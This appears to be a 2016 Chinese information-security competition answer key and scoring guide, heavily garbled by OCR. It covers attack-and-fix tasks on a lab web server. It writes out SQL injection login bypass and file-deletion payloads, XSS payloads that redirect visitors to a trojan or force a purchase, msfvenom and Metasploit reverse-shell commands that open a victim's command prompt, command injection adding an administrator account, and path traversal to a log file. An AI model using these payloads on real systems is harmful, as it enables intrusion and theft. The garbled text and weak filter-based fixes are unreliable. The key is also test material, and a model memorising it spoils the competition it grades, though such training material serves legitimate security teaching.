2016信息安全管理與評(píng)價(jià)賽項(xiàng)賽題與評(píng)分標(biāo)準(zhǔn)-第二階段答案及評(píng)分標(biāo)準(zhǔn)

任務(wù)1:SQL注入攻防〔55分〕1.We昉問(wèn)DCS種的WebServ2003效勞器,進(jìn)入login.php頁(yè)面,分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕23<tltle.LogLnitle>dhttp-equiv-^ciorite-nL-Typc-**oocnte-nt/ht■!rclia.T5c-t-ut6</h&ad^9<body>Loq|iii</hl>I'd''CujchlHuLlAm?EJL.In苴uLLlwulhodH^pu-ift?r>IIIflJWj:<inputt國(guó)t'-nsnriiB^/X/br>"5Password:Cinputtype--■paname-irpasswri1G<lu￡>uttyfj=t-■'sliJ-n￥<1ue-'"SuJjbJ.t^/>fttibsptiiLsp'dijijpuittype—■'x^se_nv<1ue-'"Rt；Het",/>||itc/rati'in19式/bod產(chǎn)20學(xué)口頁(yè)面標(biāo)題：<title>LoginPage</title>找到提交的變量名〔3分〕提供以下變量:name="usernmname="passwd.對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行SQLft入滲透測(cè)試,使該Web站點(diǎn)可通過(guò)任意用戶名登錄,并將測(cè)試過(guò)程截圖；〔5分〕Usurname:anyPassword：any101r100=100構(gòu)造注入語(yǔ)句:username：任意用戶名password:含：orX='X〔X為任意值〕〔3分〕同時(shí)包含截圖：1、通過(guò)任意用戶名登錄〔截圖〕2、登錄成功頁(yè)面〔截圖〕ItB.1.^U^/success-php-Mi文件電漸后通歪看爐的書(shū)中工具?幫用.、退、.回曲小/速索爐七⑤Mtp://192.166.l.Z32/5ucct5=.phpLevinSuccess\E「.t二i~T上匚Web〔2分〕.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到loginAuth.php程序,使用Ed讓Plus工具分析并修改PHP源程序,使之可以抵御SQL注入,并將修改后的PHF?程序截圖；〔10分〕3useinarne=$GET[+usernm'|；$paS5WG>d=S_GET['p^swd'];$CQim=ms5qlconnect,1270+0.1"；'m7'roof)；iff!$corn)(ConnectFailure</brmssq|_$elactdbCusers'$conn)orexhCDBSelectF4ilur?</br>);$sql;selectpasswordfromurrswhereusername=FSusername"";Jres^msscjLquerydsql.5wriniorexitf'DBQueryFallure</br>P);W(S□bj=e5sqLfetch_口bjeet(S『es)乂if($obj->password==Spdssword){he^defCIocationsuccess,php);)edi.Passwordiswrong';h—derf"R而一一1：卜:url=：/71/f?ilur￡phimRls?(echo"UsernameDaesNatExistheader('Rgfiresh:3;url=y^—j/f新山『孰phpr);](10分)包含語(yǔ)句：selectpasswordfromuserswhereusername='$username'if($obj->password==$password)4.再次對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCS種的WebServ2003效勞器進(jìn)行SQLS入滲透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖；(5分)同時(shí)包含截圖：1、通過(guò)任意用戶名登錄(截圖)

2、登陸后,頁(yè)面出現(xiàn)用戶名不存在提示；〔截圖〕文性Qr編更卻查看5收霰兇TMqj增的魚(yú)?nk-Llh.pgUsernaioeDoesNotEkist〔5分〕5.WetO續(xù)訪問(wèn)DCS外的WebServ200陰艮務(wù)器,"/"-^Employe5.InformationQuery",分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕

1?3丁h&nd；-3<tit/titls>5<wBtahttp-10￡[11.1?=^cont-ent-1ype'Jconten.text/htmil;char：Eet=utf-H6</headD>7D<Jbody>“已lupLiilEMpJxiy也量U客"工ZU]>10Cforillxrt10i1kqQunryCtrlBphpWhcHl*1pq|fttn>11rrs^jnantf1!：<lnputtyp/—“土產(chǎn)比七**hait-*pi?riiiim1?<inpiit十yp^t-rVfl1；i^—^smhmit/>￡nhspfcnhsp<inpu]ti_ypf^Lr^與2trwa)ime—~13</for?C>?14</brXahrst=slisi,htmI->-CoBack</aX/br'5]15</body>1G17</htmr-*Q『1jiiJ找到的源程序含有頁(yè)面標(biāo)題:<title>Query</title>找到提交的變量名〔3分〕name="usernm"6,對(duì)該任務(wù)題目5頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,根據(jù)輸入“%以及“〞的返回結(jié)果確定是注入點(diǎn),并將測(cè)試過(guò)程截圖；〔5分〕Uuftulfii*：%wi<j■Uuftulfii*：%03,.畫(huà)H；.**—?jiǎng)漥昨川|舟―13MxlHBV：y%?d?■sneryuedajntaai1lyuedriKdc.<unT-LFliW?EF7■電蟒兩？33□cerr^Eif-:)ii^eiftui3tlidHiMw.ev4TeL：ciiff7Tan^3口serTiSDe.sjzi^jaEiRn?mHHmLml]Bimqii??hUte"tTei-fliwiwr?iO'IfibLlc:口的聒織胡(2分)

Wti■?簪X*?k*li(|■■堂弟■呼Wti■?簪X*?k*li(|■■堂弟■呼1As*6噸Uwirn-ahriie:「旬產(chǎn)1前?4>KaK：TWiddiLUwU-jw4sl?J6m】；910EEJTF■hzUK"」luWLH4K；li^ciLukiII或yitstiLkcri：miiaioEEn司8衛(wèi)Enune-Rfmvi(Case:r>j>iuanRmilmumfefiimTmulEWF輸入";,返回所有用戶信息〔截圖〕〔3分〕7.通過(guò)對(duì)該任務(wù)題目5頁(yè)面注入點(diǎn)進(jìn)行SQL注入滲透測(cè)試,刪除DCS種的WebServ2003效勞器的目錄下的1.txt文檔,并將注入代碼及測(cè)試過(guò)程截圖；〔5分7.構(gòu)造注入語(yǔ)句：‘exec'delc:\1.txt'--〔5分〕8.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到QueryCtrl.php程序,使用Ed讓Plus工具分析并修改PHP源程序,使之可以抵御SQL注入滲透測(cè)試,并將修改后的PHP源程序截圖；〔10分8.截圖：在效勞器場(chǎng)景QueryCtrl.php源程序語(yǔ)句：$keyWord=$_REQUEST[usernm']之后參加：5keyWord=addsl3shes〔$|ctyWord〕；SkeyWord=rtF_repla?〔T,%",T,\%",$k*yWord〕;4kfiyWord=StrreplaceJi\$ksyWord〕;〔10分〕9.再次對(duì)該任務(wù)題目5頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該Webserver進(jìn)行SQL注入滲透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖.〔5分〕通過(guò)：‘exec'delc:\1.txt'一再次進(jìn)行SQL注入截圖；系統(tǒng)出現(xiàn)錯(cuò)誤提示：BadKeyWord〔截圖〕〔5分〕BarnLng:as3q〕_oiEry1；〕[fimrtlniLiKBqlnjgM：陛羽電里二第1行：丁附亞彎譚涉緋L〔severity閭5.二胃中施汗匕—"但用工]-.^^lineIT?arMmg;自qL,事ery〔l「fuibn■信:口1型屋門(mén)]；fitldln?C.\lwSBi^\?\fliuitnCirLphpmliiwITrarjii￡i?：K5'j]_Etii；hL0fciKt〕：wHiedliCJt打mi日^olliESfll-jfiult1修dothioC：U|M^s￥\iiBi^flucnCtrL^&nIm13Bad■&心kGigJV任務(wù)2:XSS^口CSR股防〔65分〕

1.We昉問(wèn)DCS外的WebServ2003效勞器,"/"->"Employe1.MessageBoard",分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕1113<tltla?leBsageBe也nd4,七工tl心?CmtA-?qaiv="Mnt?nt-Typ?"conient?r*text/html;charutf-6</hsAci><hl>Enploye?MessjigeBoar￡K/hl><fS/鼻?tg語(yǔ)〞總“M.php"WithCi牛、8tBUnaiM!<lnputtype="teiCf1n力三1'Ecs133g君Usernainc/X/br>9Nessage:</br>10<textarear?忖導(dǎo)="1仃"cols=rr50"Jian〕e='message_X/textareax/br>11<inputtype""sub<rlt"Bvalue?t/>S：ntosp <1nputtype^^reset"■vfllue""Reset,n/>12</￡omO13</htrnl>14<?php15echoH<7hrX國(guó)hjeef=Dlspla^fcL^ssagft.phph>Displayuesoage</dL>R1;--T>含有頁(yè)面標(biāo)題：<title>MessageBoard</title>找到提交的變量名：〔3分〕name="MessageUsernamename="message"2.對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行XSSt透測(cè)試,并進(jìn)入"/"->2.EmployeeMessageBoard"->"DisplayMessage"頁(yè)面,根據(jù)該5分〕頁(yè)面的顯示,確定是注入點(diǎn),并將測(cè)試過(guò)程截圖；5分〕構(gòu)造注入代碼：〔2分〕<script>while〔1〕{alert〔"Hacker!"〕;};</script>測(cè)試注入成功：〔3分〕3hi1尸;門(mén)I1日,Lglitdrfltn.宕IE■/盧；提小岫夫賽'方,丁■司?立打|寓121,11mllp：小I崢CommunicationMessage彈出alert〔"Hacker!"〕括號(hào)中的消息;3.對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,使"/"->"Employe3.MessageBoard"->"DisplayMessage"頁(yè)面的訪問(wèn)者執(zhí)行網(wǎng)站〔〕中的木馬程序：,并將注入代碼及測(cè)試過(guò)程截圖；〔5分〕構(gòu)造注入代碼：〔2分〕<script>location.href="";</script>測(cè)試過(guò)程：〔3分〕

CoMtnunicatiotiMessage名稱：trojanhorse.exe發(fā)送者：4.通過(guò)IIS搭建網(wǎng)站〔〕,并通過(guò)Kali生成木馬程序TrojanHorse.exe,將該程序復(fù)制到網(wǎng)站〔〕的WWW目錄下,并將搭建該網(wǎng)站結(jié)果截圖；〔5分〕Internet信息效勞:網(wǎng)站目錄下存放:trojanhorse.exe搭建DNS〔1分〕

333便jKj333便jKjrxji蹄與二五〞工修司用?9步氮〞.必1名H用■一士叫閨[JKWVHdUM—?■iJu4KkaiisrgI■000^It*Lfl.J正向查找區(qū)域：主機(jī)〔截圖〕Zone：Org主機(jī)：hackerMetasploitFramework:TrojanHorse.exe生成〔3分〕root@bt:?#Ifconfig〔截圖〕顯示KaliIP地址：root?localhost:-J*insfveron-pv.irtdwiiTeterprater.rflv?rsfl_tcplhost=1Q13LPWT-8Q-fexe-otrojanhorse,e>terjoplat^arrv.asse'ected,choosingHst::^odjIe::PlatTorn::'LMndD<'sTromiihepayloNoArchselectingArch;xBGfromthepaylcaJnoercoderorbadcharsspecifled?outputtingra〞payloadPayloadSize:293bytg5a\cd心:_tf'ojirihcrit,ext截圖包含：root@bt:~#msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=80fexe-otrojanhorse.exe5.當(dāng)"/"->"EmployeeMessageBoard"->"DisplayMessage"頁(yè)面的訪問(wèn)者執(zhí)行網(wǎng)站〔〕中的木馬程序TrojanHorse.exe以后,訪問(wèn)者主機(jī)需要被Kali主機(jī)遠(yuǎn)程限制,翻開(kāi)訪問(wèn)者主機(jī)的CMD.exe^T令行窗口,并將該操作過(guò)程截圖；〔5分〕(2MetasploitFramework：HackerReverseTcp連接客戶(2分)root@bt:~#msfconsolemsf>useexploit/multi/handlermsfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=>windows/meterpreter/reverse_tcpmsfexploit(handler)>setLHOSTLHOST=>msfexploit(handler)>setLPORT80LPORT=>80msfexploit(handler)>exploit[*]Startedreversehandleron[*]Startingthepayloadhandler...(截圖中包含黃色局部)訪問(wèn)者主機(jī)需要被Kali主機(jī)遠(yuǎn)程限制(3分)KaliMSF提示(截圖)包含如下信息KaliIP:訪問(wèn)者主機(jī)IP:[*]Sendingstage(bytes)to[*]Meterpretersession1opened(->atmeterpreter>nrf#xplstrrhardler)>SKpldr*Startediteyerieband1eron1'92.1.6S.1,.213;SOT5￡*「￡ii「gthipaylQdd卜5寸?「一**1Serdingstage(EaSfiKbytes1to192?16B.1.211>]^Merpr?ermssHoh2openedLZ13:?0/H2+lflS,1.211:1302)就2021-05-05l&：n：59fOSOClKali截圖包含翻開(kāi)訪問(wèn)者主機(jī)的CMD.ex喻令行窗口;工?上trpmr?ihtllProcess9-SUcrcited.Clldiinr#11仃賴工他產(chǎn)寸匚「七口十七wirdosxP[不主5B1.2oOJ](C)曦工產(chǎn)TT1945*1-icrosoftCorp?G,.gc/MEJird"Hr審ystr,醫(yī)■.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到insert.php程序,使用EditPlus工具分析并修改PHFW程序,使之可以抵御XSSt透測(cè)試,并將修改后的PHF?程序截圖；〔10分〕〔10分〕在效勞器場(chǎng)景原insert.php程序語(yǔ)句$info=$_REQUEST['message]后參加：綠色局部,通過(guò)替換函數(shù),通過(guò)其它字符({},(),[]等字符)替換字符“<〞和“>〞均可得分；$info=str_replace(“<〞,"(〞,$info);$info=str_replace(“>〞,")〞,$info);或$info=str_replace(“<〞,"{〞,$info);$info=str_replace(">","}〞,$info);或$info=str_replace(“<〞,"[",$info);$info=str_replace(">","］〞,$info);.再次對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCS種的WebServ2003效勞器進(jìn)行XSSJt透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖；〔5分〕金］總4—L——J7：沙［ikQM15m小小〞.而~memjComnunicat1onMcssagcFoBllHfPerMn"mi&MIP：IJPujlin*Tinr：1S-10-SI0TLAS1￡6Pl口電1EtcIe曰呂也由亡CmtEni：(scrxpOi4iilc(lMilerl3r(AcripOSQLServer企業(yè)治理器中,Message表中info字段注入語(yǔ)句符號(hào)“<〞和“>〞被替換為上一題替換后的字符；同時(shí)CommunicationMessage頁(yè)面顯示Content:注入語(yǔ)句符號(hào)“<〞和“>〞被替換為上一題替換后的字符；〔5分〕.Web^問(wèn)DCS外的WebServ2003效勞器,"/"->"ShoppingHall",分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕1Kta*<*tvE-af=11iT^&T'QcwiCDrphp-?^a4d!F=k?^bQaEd￡￡|uantIt-y=l'>JLa^te?a.r^i^iap￡inbsrp￡nti-9p]i3fB：100.Og/jiXZb假設(shè)A,,4k!?t,<*hTiit='ShopplngFx^c?E￡.php7gcadEF=raQLLM￡q^Mntit-y=l!Mfcnjs?-&rb5p fanbspjU^￡,9-0.D0</AX/13E>-'r^1■￡!?m<Bhc*r='Inq￥rK?sp.php'*go4d?=ne>n1t?r￡>q]untlt^=l?制1011；1{4>“通用6滴叩&曰叩的111;5..4#<311下也[：;>叮?chg>*<*15hQpp]kr^PEQC?：*?-php?^wa?-cpikU^*rtti,ty*la>crB4hfc<fp￡4ib?^?j)bf^wfi.i0Oi^/be.7hM*<*heft9事g*9J3f4MiM?：pHp?qx3nHKEyfiquM^"E1MWry<*?pdbqpCrib,nB;M9.OQK/ix/bE^'!?tecMy5Shopp1n^Frwa?「php?g?d-r>"dv4xcMqujTitLt『3l1RVDRWfi*:J#0.,*tKfax/br>":k￡?'X/brX/brX/biX/tirXMsrXahze￡?rlist.iitml7>3<iEac^/aX/b^^jT0頁(yè)面標(biāo)題為：<h1>ShoppingHall</h1>找到提交的變量名：〔3分〕goods=keyboard&quantity=1goods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19,對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,使"/"->"EmployeeMessageBoard"->"DisplayMessage"頁(yè)面的訪問(wèn)者向頁(yè)面ShoppingProcess.php提交參數(shù)goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php頁(yè)面,并將注入代碼及測(cè)試過(guò)程截圖；〔5分〕構(gòu)造注入代碼：〔2分〕<script>document.location=".X/ShoppingProcess.php?goods=cpu&quantity=999999";</script>WebserverIP:測(cè)試過(guò)程：〔3分〕ShoppingCartTotalAJiourrris的的切口do截圖:GoodsCPU數(shù)值大于或等于99999910.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHF?程序,使之可以抵御CSRF＞透測(cè)試,并將修改后的源程序截圖；(10分)171￡(*jCO0KZI<|vUMCmtf13-riiue)1IBhr?fa11MlMtitesMQtMesaag?</?x/bE>)19//echo'"Ccintexitstriptagst"串曲1->工比0叱)jyFbrx/bEX/lfeExrHTX/tEX/tgH:加ecto"Content:-^abjr>^fov.^/br>cfbr></b!^/bz>=：/,lbE></'th>";Kho>echs4X/tJible>'+JXechoy『bx>Shref='ttes&a9eBoArd.phpP>bp!lojfisatteg&gQBmeAC/aX/bi>1*;2&7>截圖:效勞器場(chǎng)景DisplayMessage.php程序語(yǔ)句:echoaContent:".〞$obj->info"."〞替換為：echoaContent:",strip_tags〔"$obj->info"〕.""〔10分〕11.再次對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用該注入點(diǎn)對(duì)該DCS種的WebServ200：B務(wù)器進(jìn)行CSR■透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖；〔5分〕〔5分〕得分點(diǎn)：直接顯示代碼信息,而不是將代碼執(zhí)行；〔截圖〕SQLServer企業(yè)治理器中,Message表中info字段注入語(yǔ)句含有標(biāo)記<script></script>;同時(shí)CommunicationMessage頁(yè)面顯示Content:注入語(yǔ)句不含有標(biāo)記<script></script>;任務(wù)3:命令注入與文件包含攻防〔50分〕1.We昉問(wèn)DCS外的WebServ2003效勞器,"/"->"DisplayDirectory",分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕,12：iC：\*■4-ntvnt-Tapw11ccnt?nt=rTt4xt/htinl5C；\TsDlrftttory</hl>ormactior^'Tispla^OarettorYCtr1.phpJ,methad=■hqetr,>EC:\1sDirectoxynputtype=FrteMfiwina=dicecto=yF,fx/t>x><lnput-ype=risLlbni^t"-『尊二?聲submif'/?&nitiSTiSnhsp<inputtype=''res：et"value=ResetpV>1011</htna>1213<?php14Kilo"</br><*href*"1i?t.htnilEack<?*></br>**j15?>頁(yè)面標(biāo)題:sDirectory</title>找到提交的變量名：〔3分〕name="directory2.對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,使頁(yè)面DisplayDirectoryCtrl.php回顯C:\Windows目錄內(nèi)容的同時(shí),對(duì)Webserver添加賬號(hào)“Hacker〞,將該賬號(hào)參加治理員組,并將注入代碼及測(cè)試過(guò)程截圖；〔5分〕注入語(yǔ)句：〔2分〕WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add測(cè)試成功：〔3分〕截圖：,ErI?://L9Z.IflkI.7DZZ*U>J*.!>工ecc4■1師7itlreelm.它〞0國(guó)曲?＞距二1一ewm趙:Lhitp...1ft'li3ZE7D.i?t?51￡“吊11電打*,770?耐1*15就同妣他中吧3“山十#1|7〔1"目謝由爭(zhēng)依曜度忒爭(zhēng)DjjkL睢d項(xiàng)jr￡typ含有：命令成功完成.3.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHF?程序,使之可以抵御命令注入滲透測(cè)試,并3.修改后的源程序截圖；〔10分〕F1***$vnj,t*ujut,j>:ftwrMvn?r法5〞下蚓「口?|/￡?:[：?,Mn廿二萬(wàn)」引？…,**/../?,_J二T川片內(nèi)?二口JEl元一.—2---J—1-i*—'1-j—=,r=丁=,i—J—1ic7*17$dir*t：tor^$_r^?cT[-direetorY11;letstr='\?f19iffctrctc〔$dlt*ct0FV,fetrj=t?l|20IE〔!ei^t^Ft9di±edt6izy〕〕I21?choypz>〞;22systemp'dli/wc:\\",^dlr?ctory〕;t3echoF『pt:士〉r24echo?<n>rK?iliTet=FCiEpl?Yl>l.r?rtQry.php'>Displ?Yc；TeDiiectQiy</ax/bi>'';2S26lelsa^27echo；29syfltBiat^dlr/w;3$eohoJQMhoybG門(mén)〞“?nt?ithadlractacynnna!M/bA叮31echohref-FDifplAyl>lr?t0ry-phpT>Diff|>l*YC：*?DiEectoty</iiX/6r>,';g\33Blse〔J4inputi*1〕;〔10分〕包含語(yǔ)句：$str=’|'if〔strstr〔$directory,$str〕==false〕.再次對(duì)該任務(wù)題目1頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該DCS神的WebServ2003效勞器進(jìn)行命令注入滲透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖；〔5分〕截圖1:利用注入點(diǎn)對(duì)該DCS種的WebServ200陰艮務(wù)器進(jìn)行命令注入滲透測(cè)試；3DisplayC:VsDirectory-licrosuftInicruet文件舊褊蟆口查看建〕收藏?工且⑦幫助皿o后退▼?▼回國(guó)心戶推案☆硒夾‘代之1681202/DisplayDiirActor/phpDisplavC:\fsDirectorvCVsDirectory:^HackerPasswordf型]Submit]Reset含有本任務(wù)第2題的命令注入語(yǔ)句；WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add截圖2:頁(yè)面出現(xiàn)非法輸入提示；含有本任務(wù)題目3修改后代碼中的錯(cuò)誤提示信息；本案例提示信息為：illegalinput!.We昉問(wèn)DCS外的WebServ2003效勞器,"/"->"DisplayUploaded'sFileContent",分析該頁(yè)面源程序,找到提交的變量名,并截圖；〔5分〕找到源程序：〔2分〕1chffanl>1MKm*4<meta-equivsr-content-TipencontentsPrtext/htblL：chaiEet=utf-Sr,/>&</twac!>.<kiX>Dlgpla^iTpladdedl'bfileContenE</hl>■i<fo?actlor^4rDispliyr11ectxl.php,pMtho^agatpp>{Wttplo-?d?d4efilsFullPath(Bg.yuaidi/uploaid*dfila..ta±);<inputtypi=^tnKt1f門(mén)=〞E：1m同mb9<Inputtype■“西iib?Li1L〞vailueaJSiLbinif/>^nbsp1typ*?-reeet'hvaltifi?-et-二.</￡on^<rhtal><?phphsy,birx*hr-f='i：L；rt,Mfta-GtoBack</ax/i&o^;*>頁(yè)面標(biāo)題：<title>DisplayUpload,sFileContent</title>找到提交的變量名：〔3分〕name="filename"6.對(duì)該任務(wù)題目5頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,使頁(yè)面DisplayFileCtrl.php回顯DCS伸的WebServ2003效勞器訪問(wèn)日志文件：AppServ/Apache2.2/logs/access.log的內(nèi)容,并將注入代碼及測(cè)試過(guò)程截圖；〔5分〕構(gòu)造注入代碼：〔2分〕..\..\..\AppServ\Apache2.2\logs\access.log回顯DCS種的WebServ2003效勞器訪問(wèn)日志文件：顯示出AppServ/Apache2.2/logs/access.log的內(nèi)容：〔3分〕

格衿口交營(yíng)出收位㈤W〔HQ后遇.)W圖G「群-m嶷宮,/格衿口交營(yíng)出收位㈤W〔HQ后遇.)W圖G「群-m嶷宮,/宣力M：.|；I?hup』理921蹌1ma/IhiLpl編中L、式ItL*旃仁1址53整m.聾￥127ap-2vETl^SE^E2F?cfl；E.1z-?=121.U.U.L--[NTFflhW加L交小MST32T.O.O121,oBnKIO.uI7T.I10J2T-0.012T.0.fl]2i-□.a]2T.0.(J12T.0-(l血Q.O127.0.0]21.0.0392.108t--|^W2C>LCe2]e02xO1-[3VW/2O16：^：D3：B1L--|2172」卻也如期我I--泛T/MMHS*陽(yáng)*Dd*4*I--[2PrFlM/2CL6:E3s05:59t--(2T/ffar/20lfi:?3:De：58[一一i2T,--?air/2DLfi:23:D7z204的口10]■O8M]4DSDE]-KJ80IE]4IM00]十照口口】■+fKOIFl■+B3DEJ飛E1FET"GET■CEI/H'TTP/LL*2Dtl2SZ八Ml+口加Sn?/Llrt200L2B/tejrt.phpMIF/L]A2DD施/HTKrl"?201252/加皿曲pHin^Ll*3004網(wǎng)L--|.2T.<H^/2DL?:2]：01:：29^0(i]■[2Wftr/2OL0：：BJ;O3;3a4(0001L--腹TEw/aomZ捫陽(yáng);鑿4■慎我]1.——131gH2fiL也盟：期鋁制創(chuàng)捫I--12T,N>r/2OLG:麒1：口及28；加陽(yáng)口喘]92-]58.L.LZJLJ霹--[21/]far/2Dlla23EWH4*OBOD]丁QM/'iQKinlutJr..phpMITT/LWN3"GET/succesf.prfi/Llr20014*POST門(mén)睢:LThBaithph?IHTP/IL-L*3DS3%BI小腳燧登中TIP〞?廣2WM7Q9T/xinEthgKT7P/I.L'3023YE1心ucEE.phpHlWh200M節(jié)0門(mén)/loein^fflh.phjmTP^LLr3023tBT,1UEH■人加1T1F/1.]rEDOIN192.1?.LLZ4J9之】斶192.3A819工,]品L1冤--Lt24--LL網(wǎng)-19工Itt.L.124--J92,158392.】㈱LIE——L1a3--咽闋J+L別--is?.]sa.i.i制-592.1%匚1型--J92L1GTL1M==[Zr/H*T/2lDiG=23e09:43+OE匚口][SVJI^I/2D1fl:2J:09i52+DB&D][21/lter/fDlla23E(?GB2*0600]+OBOD]【緋觸"201次典UhBF+C6C1O][2VAfez/?Dlf:2]：H:B7+OBM][2Vfcx/20iCa2JU]E5T-H)BU][2-/ll：ir/2DD￡-231]-BS-HDBDD]+OBN1][2VHar/?Dlls?3HhSS+ABOD][n/hr/feDlfi:73s12:0+OBDI]I[21/)tel/2Dl!8:2Jsl2s23+CEED]l7VJter/aDll!21!MeU4CDD0]*GET/HTTF/1.「200252*GET/Lo^in-phpErnp/LIdTDDQM飛WnnurMju血>HITFJL-302J'GET/wccejs.php“GET"第T*GET"CET1-77二二二*GET"GET二號(hào)二E.php/sujdce三舊,jhp/SUteras,php島口Mzaurcts's.php/Eucce2s'i=hp/succeEB./SLicrryy,php"GET/succesE.phg*get/mrp/i..r：HTTF/l,L/Lt*/l.I*HTTF/l.rRTTP/1P/LL*E1TF/LTHTTF/l.rHT7P/1,tr如口：00ZDQ2002DD到口20n20DJDO丸口EDDHjq14相IT3414】qH192.]tf8iL12d--ifiui圜.I」霹-392L1?.L12a--"盤(pán)1髭J“加4.392.]sa.IJ蔚,"<」驊」/案--】皺-i*.L-LA4——392.10B,i.iaa-■■192.]tf8iL12d--ifiui圜.I」霹-392L1?.L12a--"盤(pán)1髭J“加4.392.]sa.IJ蔚,"<」驊」/案--】皺-i*.L-LA4——392.10B,i.iaa-■■】見(jiàn)]63.LL&——192.1S?.LILS-=[25/Jtax/2Dlli23&M￡50+OBDO]l2Vlfar/^)18323;16：dn+CBDD](2V1Ibz/2D1IG=2^=15=03+OBQD][aiHkr/iDiiiaaiiaiu+obod][rr/!tax/^Difi：2]H€Eia*obdd][2VIfci/2DJ652J;l6;(S+ABOT]i2VlW加[4厘斯！T±3tmiu/SDlfiaaOslTaOa+OBDO][21/1for/701li23iJTF(n*OBDO]：[ZT/n*r/ZDJfi;23;n;ns-KIBDO]【2X%)a)W:23〞力州+OBM]*PQSTA^inAutkphprfTTP/l.3Q2"GETZsutces-Bid)ujHUF/l.T?D0M*CET/UrtT/i.r就.2K"GET,工gi±u限EaW].lF￡DD4四"POST/Lr-fi^AwKphpBTTP/t.UM2"GET/sLirrcm.php/l,.ZDD144GETJ/l.r30021s2InternetExplorer地址欄中須含有:DisplayFileCtrl.php?filename=7.進(jìn)入DCS伸的WebServ2003效勞器的C:\AppServ\www目錄,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHF?程序,使之可以抵御文件包含滲透測(cè)試,并將修改后的源程序截圖；〔10分〕6-f[p￡3dlciHJMa4j/客￥七工=er―gif(strstr(@￡11nnain-.$sTe)=2.1s?.I(iiri,■腥Ey(ifiiiinuMnI■rho"中唱叱,：14vcho收f(shuō)pr"-：TOC\o"1-5"\h\z11?ch￡F"y/b片hr*C^hDLflplLl?a+>DiV|>lM<dM+?F<CenlrtnK.r1313)?lw(ittctw；"EnwrThtvplaided'*riltfullj15eeteHF</bE-xaH±±f?*ti±sjpJL占fP±L-.php〞力3*邛.&甘si^llacqeie.amt<^ax/bo11'1*ir71BBata"Zlle^aJ.uiput■wjIIschciF/bEX?hx?f="AisplayFlie.php"(>￡11Eplxy3plDAd*<lr￡Fll?Coat*Qt</aX/br>Bi；如?antb；〔10分〕包含語(yǔ)句:$str=；.'if(strstr($directory,$str)==false)8.再次對(duì)該任務(wù)題目5頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試,驗(yàn)證此次利用注入點(diǎn)對(duì)該DCS神的WebServ2003效勞器進(jìn)行文件包含滲透測(cè)試無(wú)效,并將驗(yàn)證過(guò)程截圖.〔5分〕截圖1:利用注入點(diǎn)對(duì)該DCS種的WebServ200陰艮務(wù)器進(jìn)行命令注入滲透測(cè)試；輸入框含有本任務(wù)題目6的注入代碼:..\..\..\AppServ\Apache2.2\logs\access.log截圖2:頁(yè)面出現(xiàn)非法輸入提示；含有本任務(wù)題目7修改后代碼中的錯(cuò)誤提示信息;本案例提示信息為：illegalinput!〔5分〕任務(wù)4:數(shù)據(jù)竊取防護(hù)：二層攻防〔45分〕.將PC1Kali所連接端口戈ij入與WA同一VLAN〔VLAN1Q,并將PC1Kali分配與DCS田艮務(wù)器相同網(wǎng)段IP地址,使PC1Kali、DCS種的WebServ2003效勞器能夠在同一個(gè)網(wǎng)段〔VLAN1Q內(nèi)相互Ping通.〔2分〕截圖：PC1Kali、DCS洞在VLAN10〔#showvlan〕5C5O-2S(fc4)(lDrftg-v1nlO)vl,L陽(yáng)NanfrTyp*MediaPorts1dctaultStaticEMETCtherntTl/O.5ttncrncti/o；/Ethcrnetl.-'O/OEtherFl'011Ethernetl■■'O13Ethernetl/0’15Ethernet1/0/17Fthfrnptl/O/Hi-rhernci1/0/21tthcrn@tl/0/23Lthflrn?L/0/256thsrn51/../CthernetL/0/6crnernetL/o/feEtherretL/0/1QEtherretl/O71?Etnerretl/O^l4EthernetI./0/16Etherii?tL/O/ISFth^rrfr1/0/7'0EthtrrerL/C/；?tthferf?!L.L/0/24trherretL/o/2titTh?rr?iL/0/2310VLAM0